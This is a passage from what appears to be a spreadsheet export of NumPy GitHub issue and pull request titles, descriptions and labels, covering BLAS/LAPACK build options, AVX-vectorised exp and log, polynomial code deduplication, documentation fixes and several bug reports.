 * num_threads(n) is a context manager to temporarily change the_x000D_
   number of threads which will be used by BLAS._x000D_
_x000D_
Closes: #11826_x000D_
_x000D_
OpenBLAS and MKL are supported.  It is possible to globally change_x000D_
the number of threads via environment variables, but it is sometimes_x000D_
desirable to temporarily lower the number of threads if this improves_x000D_
performance.</t>
  </si>
  <si>
    <t>ENH: Implement setting the number of threads used by BLAS</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
_x000D_
Hi All,_x000D_
 We had to use 'numpy' in one of my program  and run the script on cloud server (IBM), where we can't install stuff._x000D_
IBM is supporting only the standard python libraries and for  non standard packages, advised  us to zip the required packages as zip file and copy it along with the script in the server location. This technique has worked for other packages but somehow is failing for numpy (couldn’t able to recognize 'numpy' through zip file) . so i installed numpy and copy the cnumpy folder from site-packages and zipped and kept it in the program folder  where i am executing my script. _x000D_
_x000D_
_x000D_
_x000D_
**this is my code to import numpy**_x000D_
_x000D_
import sys_x000D_
import os_x000D_
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)),"numpy.zip"))_x000D_
import numpy_x000D_
_x000D_
_x000D_
_x000D_
### Error message:_x000D_
_x000D_
(tutorial-env) rajm-mbp:python rajm$ python3 ExcelSplit.py_x000D_
Traceback (most recent call last):_x000D_
  File "/Users/rajm/Python/numpy.zip/numpy/core/__init__.py", line 40, in &lt;module&gt;_x000D_
  File "/Users/rajm/Python/numpy.zip/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/Users/rajm/Python/numpy.zip/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath'_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "ExcelSplit.py", line 17, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "/Users/rajm/Python/numpy.zip/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
  File "/Users/rajm/Python/numpy.zip/numpy/core/__init__.py", line 71, in &lt;module&gt;_x000D_
ImportError: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/Users/rajm/Python/tutorial-env/bin/python3),_x000D_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No module named 'numpy.core._multiarray_umath'_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
1.16.2 3.7.2 (v3.7.2:9a3ffc0492, Dec 24 2018, 02:44:43) _x000D_
[Clang 6.0 (clang-600.0.57)]_x000D_
</t>
  </si>
  <si>
    <t>Trying to use Numpy package as zip instead of installing NUMPy</t>
  </si>
  <si>
    <t xml:space="preserve">This commit implements vectorized single precision exponential and_x000D_
natural log using AVX2 and AVX512._x000D_
_x000D_
Accuracy:_x000D_
_x000D_
| Function | Max ULP Error | Max Relative Error |_x000D_
|----------|---------------|--------------------|_x000D_
| np.exp   | 2.52          | 2.1E-07            |_x000D_
| np.log   | 3.83          | 2.4E-07            |_x000D_
_x000D_
Performance:_x000D_
_x000D_
(1) Micro-benchmarks: measured execution time of np.exp and np.log using_x000D_
timeit package in python. Each function is executed 1000 times and this_x000D_
is repeated 100 times. The standard deviation for all the runs was less_x000D_
than 2% of their mean value and hence not included in the data. The_x000D_
vectorized implementation was upto 7.6x faster than the scalar version._x000D_
_x000D_
| Function | NumPy1.16 | AVX2   | AVX512 | AVX2 speedup | AVX512 speedup |_x000D_
| -------- | --------- | ------ | ------ | ------------ | -------------- |_x000D_
| np.exp   | 0.395s    | 0.112s | 0.055s | 3.56x        | 7.25x          |_x000D_
| np.log   | 0.456s    | 0.147s | 0.059s | 3.10x        | 7.64x          |_x000D_
_x000D_
(2) Logistic regression: exp and log are heavily used in training neural_x000D_
networks (as part of sigmoid activation function and loss function_x000D_
respectively). This patch significantly speeds up training a logistic_x000D_
regression model. As an example, we measured how much time it takes to_x000D_
train a model with 15 features using 1000 training data points. We_x000D_
observed a 2x speed up to train the model to achieve a loss function_x000D_
error &lt; 10E-04._x000D_
_x000D_
| Function       | NumPy1.16  | AVX2   | AVX512 | AVX2 speedup | AVX512 speedup |_x000D_
| -------------- | ---------- | ------ | ------ | ------------ | -------------- |_x000D_
| logistic.train | 121.0s     | 75.02s | 60.60s | 1.61x        | 2.02x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</si>
  <si>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Use AVX for float32 implementation of np.exp &amp; np.log</t>
  </si>
  <si>
    <t>Prior to this enhancement compiling numpy would forcefully check BLAS/LAPACK_x000D_
libraries in the following order:_x000D_
_x000D_
BLAS:_x000D_
- mkl_x000D_
- blis_x000D_
- openblas_x000D_
- atlas_x000D_
- accelerate_x000D_
- NetLIB BLAS_x000D_
_x000D_
LAPACK:_x000D_
- mkl_x000D_
- openblas_x000D_
- atlas_x000D_
- accelerate_x000D_
- NetLIB LAPACK_x000D_
_x000D_
This is problematic if a user want to build using, say, OpenBLAS but MKL is installed._x000D_
Even populating the site.cfg correspondingly one would get a successful build, but_x000D_
using MKL, if present._x000D_
_x000D_
The same applies to OpenBLAS vs. ATLAS etc._x000D_
_x000D_
Especially for developers this may be desirable to check performance with various_x000D_
BLAS/LAPACK libraries._x000D_
_x000D_
This fixes the above issues by enabling users to forcefully set the order of loads_x000D_
via environment variables:_x000D_
_x000D_
  $&gt; export NUMPY_BLAS_ORDER=openblas,mkl,atlas_x000D_
  $&gt; python setup.py config ..._x000D_
_x000D_
would first try OpenBLAS (if existing), then MKL, and finally ATLAS._x000D_
In this case the build would fail if neither of OpenBLAS, MKL or ATLAS is present._x000D_
I.e. this can also be easierly used to test whether a linking would work. This_x000D_
is because specifying a single library forces only one library check and has_x000D_
no fall-back procedure (as requested by the user!)._x000D_
_x000D_
The same applies to:_x000D_
_x000D_
 NUMPY_LAPACK_ORDER=openblas,mkl,atlas_x000D_
_x000D_
This has meant that the `blas_opt_info` and `lapack_opt_info` classes in_x000D_
`system_info.py` has *completely* changed._x000D_
_x000D_
Effectively there is only ONE change:_x000D_
_x000D_
A fall-back of LAPACK was previously using `get_info('blas')` to get_x000D_
the BLAS library to correctly link LAPACK. However, this may be undesirable_x000D_
when the user has OpenBLAS/BLIS/ATLAS in a BLAS only installation but wants_x000D_
to use the NetLIB LAPACK. Hence now `lapack_opt_info` uses `get_info('blas_opt')`_x000D_
which does change the fall-back routine slightly. But perhaps for an easier build?</t>
  </si>
  <si>
    <t>BLD: Allow users to specify BLAS and LAPACK library link order</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>Reduce the output on circleci when building docs to just the warnings (and errors)</t>
  </si>
  <si>
    <t>BUILD: use 'quiet' when building docs</t>
  </si>
  <si>
    <t>These fitting functions are all the same - the algorithm used does not care about the basis._x000D_
_x000D_
This was done using:_x000D_
* A regex find / replace on all but poly and cheb_x000D_
* A manual diff showing that cheb differed only by whitespace_x000D_
* A manual diff showing that poly differed in `deg.ndim == 1` vs `deg.ndim &gt; 0`._x000D_
  Given that this function only allows `deg.ndim &lt;= 1`, and `ndim &gt;= 0`, these two comparison are equivalent._x000D_
_x000D_
---_x000D_
_x000D_
Here's the real jackpot in terms of de-duplicated lines in `np.polynomial`</t>
  </si>
  <si>
    <t>MAINT: Unify polynomial fitting functions</t>
  </si>
  <si>
    <t>These functions are all the same - the algorithm used does not care about the basis._x000D_
_x000D_
This one is too small to be caught by LGTM, but still worth making numpy smaller ~50 lines at a time</t>
  </si>
  <si>
    <t>MAINT: Unify polynomial addition and subtraction functions</t>
  </si>
  <si>
    <t xml:space="preserve">I've found that automatic merges seem to go better if there are no blank lines between headers and the content below them._x000D_
_x000D_
This is consistent with the older release notes anyway_x000D_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</si>
  <si>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Tidy 1.17.0 release note newlines</t>
  </si>
  <si>
    <t xml:space="preserve">This changes the behavior for:_x000D_
* The `deg`  and `axis` arguments of `&lt;type&gt;der`_x000D_
* The `deg`  and `axis` arguments of `&lt;type&gt;int`_x000D_
* The `deg`  argument of `&lt;type&gt;gauss`_x000D_
* The `deg`  argument of `&lt;type&gt;vander2d`_x000D_
* The `deg`  argument of `&lt;type&gt;vander3d`_x000D_
_x000D_
The old behavior was:_x000D_
* Raise `ValueError` if the argument is a float, but not an integral one_x000D_
* Allow a float like `1.0` to mean `1`._x000D_
_x000D_
This is inconsistent with most other integer-accepting APIs in numpy, which require these to be actual integers, and raise TypeError when they are not._x000D_
_x000D_
The new behavior is:_x000D_
* Raise `TypeError` if the argument is a float, but not an integral one_x000D_
* Emit a `DeprecationWarning` if a float like `1.0` is passed, continuing to allow it its old meaning._x000D_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</si>
  <si>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DEP: polynomial: Be stricter about integral arguments</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: unhandled exception in CBLAS detection_x000D_
_x000D_
In the function "has_cblas", it tries firstly to link to libcblas, if encountering linker error, it tries to link to libblas. When the second link fails, an exception distutils.ccompiler.LinkError will not be handled._x000D_
If neither libcblas or libblas is linkable,  it consider CBLAS is inexistent, avoiding unhandled exception._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix unhandled exception in CBLAS detection</t>
  </si>
  <si>
    <t>See #13121_x000D_
_x000D_
Allows direct access to the global RandomState instance used by_x000D_
functions in the `random` module, so that it can be used interchangeably_x000D_
with user-instantiated RandomState instances.</t>
  </si>
  <si>
    <t>ENH: add get_random_state function to numpy.random</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #13013. Only created the links, did not merge the descriptions.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</si>
  <si>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Fix c-api function documentation duplication.</t>
  </si>
  <si>
    <t>Update the submodule scipy-sphinx-theme to the latest version._x000D_
_x000D_
Search was broken at [numpy.org/devdocs](http://www.numpy.org/devdocs/index.html), locally this was enough to fix it.</t>
  </si>
  <si>
    <t>DOC: update scipy-sphinx-theme, fixes search</t>
  </si>
  <si>
    <t>Both the `constant_values` and `end_values` arguments can have non-integer numerical types. The example in #9489 works, as does:_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; arr = np.array([1.0, 2.0, 3.0])_x000D_
&gt;&gt;&gt; np.pad(arr, (5, 5), mode='linear_ramp', end_values=(np.float32(5.0),np.float32(-4.0)))_x000D_
array([ 5. ,  4.2,  3.4,  2.6,  1.8,  1. ,  2. ,  3. ,  1.6,  0.2, -1.2,_x000D_
       -2.6, -4. ])_x000D_
```</t>
  </si>
  <si>
    <t>DOC: Fix arg type for np.pad, fix #9489</t>
  </si>
  <si>
    <t>Added some backticks for LAPACK routines in a few docstrings, and for a few variable names used in examples.</t>
  </si>
  <si>
    <t>DOC: Add backticks in linalg docstrings.</t>
  </si>
  <si>
    <t>- Add backticks for some parameters in the body_x000D_
- Address the wording changes in the issue_x000D_
_x000D_
#12050</t>
  </si>
  <si>
    <t>DOC: Fix #12050 by updating numpy.random.hypergeometric docs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Consider the following example_x000D_
```_x000D_
import numpy as np_x000D_
t = np.empty(1, [_x000D_
    ("a", int),_x000D_
    ("b", int, ()),_x000D_
    ("c", int, 1),_x000D_
    ("d", int, (1,)),_x000D_
    ("e", int, 2),_x000D_
    ("f", int, (2,)),_x000D_
])_x000D_
for field in "abcdef":_x000D_
    print(t[field].shape)_x000D_
```_x000D_
This prints_x000D_
```_x000D_
(1,)_x000D_
(1,)_x000D_
(1,)_x000D_
(1, 1)_x000D_
(1, 2)_x000D_
(1, 2)_x000D_
```_x000D_
i.e. the `("c", int, 1)` field is treated as a scalar, but not the `("d", int, (1,))` field._x000D_
_x000D_
While a careful reading of https://docs.scipy.org/doc/numpy/reference/arrays.dtypes.html does show that this behavior is documented ("Note that a 3-tuple with a third argument equal to 1 is equivalent to a 2-tuple."), it looks a bit contrary to normal expectations (for most numpy functions, when a single integer is allowed where a shape is expected, that single integer is usually treated as a single-element tuple containing that value).  Note that there are already two other ways to specify a scalar field (either don't pass the shape at all, or pass an empty tuple), so it would be nice if the behavior of `("c", int, 1)` could be made more consistent._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
(see above)_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
```_x000D_
1.16.2 3.7.2 (default, Dec 29 2018, 06:19:36) _x000D_
[GCC 7.3.0]_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>shape-1 fields in dtypes are collapsed to scalars</t>
  </si>
  <si>
    <t>['00 - Bug', '07 - Deprecation', 'component: numpy.dtype', 'defunct — difficulty: Intermediate']</t>
  </si>
  <si>
    <t xml:space="preserve">Also found by LGTM._x000D_
_x000D_
While this does generalize to all polynomial types, `cheb` and `poly` have some optimizations that may as well be left alone. This does adjust the variable names in those optimizations to be a little more consistent (in a separate commit)._x000D_
_x000D_
cc @charris, since this is now the 4th PR like this of mine you've looked at (#13107, #13078, #13079)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Unify polydiv</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Standart deviation formula could give unexpected result (e.g. imaginary values) when input is implicitly complex._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.array([None, 0])_x000D_
a[0] = 1j_x000D_
b = np.array([1j, 0])_x000D_
_x000D_
print(f'res={np.std(a)}, dtype={a.dtype}') # gives imaginary std_x000D_
print(f'res={np.std(b)}, dtype={b.dtype}')_x000D_
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numpy 1.16.2_x000D_
python 3.7_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
res=0.5j, dtype=object_x000D_
res=0.5, dtype=complex128_x000D_
</t>
  </si>
  <si>
    <t>Wrong std for implicitly complex input</t>
  </si>
  <si>
    <t xml:space="preserve">The traceback of `np.reshape([1, 2, 3], 2)` is shortened from_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File ".../numpy/core/fromnumeric.py", line 56, in _wrapfunc_x000D_
    return getattr(obj, method)(*args, **kwds)_x000D_
AttributeError: 'list' object has no attribute 'reshape'_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File ".../numpy/core/overrides.py", line 151, in public_api_x000D_
    implementation, public_api, relevant_args, args, kwargs)_x000D_
  File ".../numpy/core/fromnumeric.py", line 296, in reshape_x000D_
    return _wrapfunc(a, 'reshape', newshape, order=order)_x000D_
  File ".../numpy/core/fromnumeric.py", line 66, in _wrapfunc_x000D_
    return _wrapit(obj, method, *args, **kwds)_x000D_
  File ".../numpy/core/fromnumeric.py", line 46, in _wrapit_x000D_
    result = getattr(asarray(obj), method)(*args, **kwds)_x000D_
ValueError: cannot reshape array of size 3 into shape (2,)_x000D_
```_x000D_
to_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File ".../numpy/core/overrides.py", line 151, in public_api_x000D_
    implementation, public_api, relevant_args, args, kwargs)_x000D_
  File ".../numpy/core/fromnumeric.py", line 300, in reshape_x000D_
    return _wrapfunc(a, 'reshape', newshape, order=order)_x000D_
  File ".../numpy/core/fromnumeric.py", line 70, in _wrapfunc_x000D_
    return _wrapit(obj, method, *args, **kwds)_x000D_
  File ".../numpy/core/fromnumeric.py", line 46, in _wrapit_x000D_
    result = getattr(asarray(obj), method)(*args, **kwds)_x000D_
ValueError: cannot reshape array of size 3 into shape (2,)_x000D_
```_x000D_
_x000D_
(The chained exception is really just an implementation detail.)_x000D_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</si>
  <si>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Prevent traceback chaining in _wrapfunc.</t>
  </si>
  <si>
    <t xml:space="preserve">One was missing from gh-13079_x000D_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</si>
  <si>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Merge duplicate implementations of `hermvander2d` and `hermvander3d` functions</t>
  </si>
  <si>
    <t>No point writing the same function 12 times, when you can write it once._x000D_
_x000D_
Done using a find-and-replace, so should be free of typos in the individual polynomial files._x000D_
_x000D_
Inspired by #13078</t>
  </si>
  <si>
    <t>MAINT: Unify polynomial valnd functions</t>
  </si>
  <si>
    <t>Turning on `-n` in `sphinx-build` results in over 1000 warnings about bad references in docs. Trying to break these down with various grep statements, it seems about 200 are from `numpy.ma`, about 150 from `polynomial` and about 150 from `c:type`. That is under half of the WARNINGS. _x000D_
_x000D_
My workflow is to run_x000D_
```_x000D_
(cd ..; pip install .); make clean; make html 2&gt;&amp;1 |tee /tmp/build.txt_x000D_
less /tmp/build.txt_x000D_
```_x000D_
and look for the most common lines. Unfortunately this takes quite a while._x000D_
_x000D_
Anyone who wishes to contribute can issue PRs against the `doc-references` branch in numpy/mattip. I have marked this as Easy since many of the WARNINGS are quite easy to fix. The first commit gives an idea of some of the problems in the c-api documentation._x000D_
_x000D_
Reviewers can get an idea of how bad things are by looking at the circle-ci devdoc build step.</t>
  </si>
  <si>
    <t>DOC: fix references in docs</t>
  </si>
  <si>
    <t>This solves #10273. Any advice on the contents is welcome.</t>
  </si>
  <si>
    <t>DOC: Add note about "copy and slicing"</t>
  </si>
  <si>
    <t>`ndarray.T` is simply a shorthand of `transpose` without `axes` option._x000D_
`PyArray_Transpose` returns a new view of the input array, regardless of_x000D_
`ndim`._x000D_
_x000D_
Close #13094.</t>
  </si>
  <si>
    <t>DOC: update doc of `ndarray.T`</t>
  </si>
  <si>
    <t>Occasionally refcheck tests were failing since the sample mean was not close enough to the desired one. Decrease the probability of failure by increasing the sample size._x000D_
_x000D_
Also add `doctest` to the help for the `refguide` option to aid discoverability.</t>
  </si>
  <si>
    <t>TEST: allow refcheck result to vary, increase discoverability of refcheck option</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.random']</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
`x.T` seems returning *a view of* `x` if `x.ndim &lt; 2`, while the documentation (https://www.numpy.org/devdocs/reference/generated/numpy.ndarray.T.html) says it returns "self".  To me it's not clear what is different between `x.T` and `x.transpose()` except for performance._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
x = np.array([3, 4])_x000D_
print(x.T is x)  # =&gt; False_x000D_
print(x.T.base is x)  # =&gt; True_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
I checked two sets of versions:_x000D_
```_x000D_
&gt;&gt;&gt; print(numpy.__version__, sys.version)_x000D_
1.16.1 3.6.5 (default, Jun 21 2018, 17:25:32)_x000D_
[GCC 5.4.0 20160609]_x000D_
```_x000D_
and_x000D_
```_x000D_
&gt;&gt;&gt; print(numpy.__version__, sys.version)_x000D_
('1.9.3', '2.7.15 (default, Nov  7 2018, 12:21:05) \n[GCC 4.2.1 Compatible Apple LLVM 10.0.0 (clang-1000.10.44.4)]')_x000D_
```</t>
  </si>
  <si>
    <t>ndarray.T does not return self as doc says</t>
  </si>
  <si>
    <t>&lt;!--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Fix #13087 by raising a ValueError with the same error message and adding a unit test for it</t>
  </si>
  <si>
    <t>BUG: Fix parameter validity checks in ``random.choice``.</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">As it was, the difference between stop and start was calculated and_x000D_
it was assumed that that would be a numpy scalar or array. This is_x000D_
not true for object input._x000D_
_x000D_
fixes #13089 </t>
  </si>
  <si>
    <t>BUG: ensure linspace works on object input.</t>
  </si>
  <si>
    <t xml:space="preserve">The patch was a workaround for our broken `exec_command`. It was removed_x000D_
in gh-1217, but then added back in gh-1321.  Now that we've fixed_x000D_
exec_command, I believe we can finally take it out for good._x000D_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</si>
  <si>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Remove our patched version of `distutils.split_quoted`</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t xml:space="preserve">our sphinx template is not really compatible with sphinx 1.8.0 and up, but they added a workaround in 1.8.3. The result used to be that the search windows dissapears, this no longer happens._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUILD: sphinx 1.8.3 can be used with our outdated templates</t>
  </si>
  <si>
    <t xml:space="preserve">np.random.choice does not raise the exception when size negative and replace=False_x000D_
_x000D_
### Reproducing code example:_x000D_
```python_x000D_
import numpy as np_x000D_
print(np.random.choice(range(2000000), -85, replace=False).shape)_x000D_
```_x000D_
return (1999915,)_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
print(np.random.choice(range(2000000), -85).shape)_x000D_
```_x000D_
raise ValueError:_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;input&gt;", line 1, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 1162, in mtrand.RandomState.choice_x000D_
  File "mtrand.pyx", line 994, in mtrand.RandomState.randint_x000D_
  File "mtrand.pyx", line 995, in mtrand.RandomState.randint_x000D_
  File "randint_helpers.pxi", line 253, in mtrand._rand_int64_x000D_
ValueError: negative dimensions are not allowed_x000D_
_x000D_
### Numpy/Python version information:_x000D_
1.16.0 3.5.2 (default, Nov 23 2017, 16:37:01) _x000D_
[GCC 5.4.0 20160609]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.random.choice does not raise the exception when size negative and replace=False</t>
  </si>
  <si>
    <t xml:space="preserve">Closes gh-11927_x000D_
_x000D_
To verify the changes I ran `python setup.py sdist` on `master` and on the branch this PR was made from, unpacked each sdist and ran this script:_x000D_
```_x000D_
import os_x000D_
_x000D_
_x000D_
def get_filelist(root):_x000D_
    allfiles = []_x000D_
    for path, subdirs, files in os.walk(root):_x000D_
        for name in files:_x000D_
            allfiles.append(os.path.join(path, name)[len(root):])_x000D_
_x000D_
    return allfiles_x000D_
_x000D_
_x000D_
path1 = 'numpy_master/numpy-1.17.0.dev0+48b0f3c/'_x000D_
path2 = 'numpy_manifest/numpy-1.17.0.dev0+a6bc29d/'_x000D_
_x000D_
files_master = get_filelist(path1)_x000D_
files_new = get_filelist(path2)_x000D_
_x000D_
print("Files now in sdist that weren't included previously:")_x000D_
for name in files_new:_x000D_
    if not name in files_master:_x000D_
        print(name)_x000D_
_x000D_
print("\n\nFiles now left out:")_x000D_
for name in files_master:_x000D_
    if not name in files_new:_x000D_
        print(name)_x000D_
```_x000D_
_x000D_
The result:_x000D_
```_x000D_
Files now in sdist that weren't included previously:_x000D_
cythonize.dat_x000D_
numpy/linalg/lapack_lite/fortran.py_x000D_
numpy/linalg/lapack_lite/f2c_d_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/clapack_scrub.py_x000D_
numpy/linalg/lapack_lite/LICENSE.txt_x000D_
numpy/linalg/lapack_lite/f2c_s_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/f2c_config.c.patch_x000D_
numpy/linalg/lapack_lite/f2c_z_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/README.rst_x000D_
numpy/linalg/lapack_lite/f2c_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/make_lite.py_x000D_
numpy/linalg/lapack_lite/f2c_c_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/wrapped_routines_x000D_
_x000D_
_x000D_
Files now left out:_x000D_
_x000D_
```_x000D_
_x000D_
I think those should all be included._x000D_
_x000D_
The `LICENSE.txt` file was the important one pointed out in the bug report. The missing `cythonize.dat` was also not good, that must have triggered recompilation of Cython files for source builds that we didn't intend have happen._x000D_
</t>
  </si>
  <si>
    <t>BLD: fix include list for sdist building</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: distribution']</t>
  </si>
  <si>
    <t xml:space="preserve">This prevents SystemErrors on overflow, fixing gh-13062_x000D_
</t>
  </si>
  <si>
    <t>BUG: Add error checks when converting integers to datetime types</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #9851. Previously we could have held on to a `PyObject*` with refcount 0._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Remove error-prone borrowed reference handling</t>
  </si>
  <si>
    <t xml:space="preserve">This PR fixes #13074._x000D_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</si>
  <si>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Convert fortran flags in environment variable</t>
  </si>
  <si>
    <t xml:space="preserve">`"Invalid version %r" % (1, 2)` would fail with `TypeError: not all arguments converted during string formatting`_x000D_
_x000D_
The `Header is not a dictionary` error had a similar problem._x000D_
_x000D_
Fixed by changing this entire function to use `.format` in place of `%`, which does not have this gotcha._x000D_
_x000D_
Found using LGTM.com_x000D_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</si>
  <si>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errors in string formatting while producing an error</t>
  </si>
  <si>
    <t>Every implementation is the same right now, other than calling a different `*vander` function._x000D_
Merging these into a single private function taking a callback results in significant deduplication._x000D_
_x000D_
Found by LGTM._x000D_
_x000D_
---_x000D_
_x000D_
Split from #13078, since one commit needed further discussion, and I made some typos in the commit message anyway</t>
  </si>
  <si>
    <t>MAINT: Merge duplicate implementations of `*vander2d` and `*vander3d` functions</t>
  </si>
  <si>
    <t>This merges together the identical implementations of:_x000D_
_x000D_
* `*fromroots`_x000D_
* ~~`*vander2d`~~_x000D_
* ~~`*vander3d`~~ (moved to gh-13079)_x000D_
_x000D_
as detected by LGTM.</t>
  </si>
  <si>
    <t>MAINT: deduplicate fromroots in np.polynomial</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
The compilation fails with an error and prints a command it is trying to execute. _x000D_
_x000D_
If I type the command at the end of the error log manually, it works._x000D_
_x000D_
I think this points to a quotation error. The additional fortran flags from the environment shall be added to the command line list after shell-style string split. It will produce this exact problem if the full list of fortran flags are added as a single string._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
clone scipy from github;_x000D_
_x000D_
activate Anaconda build enviroment._x000D_
python runtests.py_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
f951: Error: unrecognized command line option '-fopenmp -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-strong -fno-plt -O2 -ffunction-sections -pipe'_x000D_
Running from scipy source directory._x000D_
/home/yfeng1/anaconda3/install/lib/python3.6/site-packages/numpy/distutils/system_info.py:730: UserWarning: Specified path /usr/local/include/python3.6m is invalid._x000D_
  return self.get_paths(self.section, key)_x000D_
/home/yfeng1/anaconda3/install/lib/python3.6/site-packages/numpy/distutils/system_info.py:730: UserWarning: Specified path /usr/include/suitesparse/python3.6m is invalid._x000D_
  return self.get_paths(self.section, key)_x000D_
error: Command "/home/yfeng1/anaconda3/install/bin/x86_64-conda_cos6-linux-gnu-gfortran -Wall -g -ffixed-form -fno-second-underscore -fPIC -fopenmp -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-strong -fno-plt -O2 -ffunction-sections -pipe -O3 -funroll-loops -I/home/yfeng1/anaconda3/install/lib/python3.6/site-packages/numpy/core/include -c -c scipy/fftpack/src/dfftpack/dcosqb.f -o build/temp.linux-x86_64-3.6/scipy/fftpack/src/dfftpack/dcosqb.o" failed with exit status 1_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.2._x000D_
_x000D_
The environment variables regarding fortran are_x000D_
```_x000D_
FORTRANFLAGS=-fopenmp -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-strong -fno-plt -O2 -ffunction-sections -pipe_x000D_
GFORTRAN=/home/yfeng1/anaconda3/install/bin/x86_64-conda_cos6-linux-gnu-gfortran_x000D_
DEBUG_FORTRANFLAGS=-fopenmp -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-strong -fno-plt -O2 -ffunction-sections -pipe -fopenmp -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-all -fno-plt -Og -g -Wall -Wextra -fcheck=all -fbacktrace -fimplicit-none -fvar-tracking-assignments -ffunction-sections -pipe_x000D_
```</t>
  </si>
  <si>
    <t>Failed to compile scipy with Anaconda gfortran.</t>
  </si>
  <si>
    <t>This previously:_x000D_
* Did not indicate the arguments in the abstract methods_x000D_
* Did not actually use the `abc` mechanism at all on python 3 (`__metaclass__` does not work any more)_x000D_
* Used the now-deprecated `@abstractproperty`_x000D_
_x000D_
This didn't cause any runtime problems, but does confuse LGTM, and was using the `abc` module incorrectly._x000D_
_x000D_
This uses python3-only features of the abc module, so can't be backported._x000D_
_x000D_
---_x000D_
_x000D_
Let's see what LGTM has to say...</t>
  </si>
  <si>
    <t>MAINT: Fix ABCPolyBase in various ways</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13056._x000D_
_x000D_
* BUG: Use subprocess.check_output to avoid leaking file handles_x000D_
_x000D_
This emitted a ResourceWarning as previously written, as the streams_x000D_
never got closed._x000D_
_x000D_
This change also detects errors in `svnversion` and `hg`, rather than_x000D_
ignoring the error code and hoping stdout contains a revision anyway._x000D_
_x000D_
* BUG: Fix distutils.get_version on python 3_x000D_
_x000D_
Previously, this would throw_x000D_
`TypeError: cannot use a string pattern ona bytes-like object`,_x000D_
which would then be silenced and never seen._x000D_
_x000D_
The previous commit stopped silencing this error, so now everything is_x000D_
visibly broken rather than silently broken_x000D_
_x000D_
Changing the strings to raw strings fixes the problem_x000D_
_x000D_
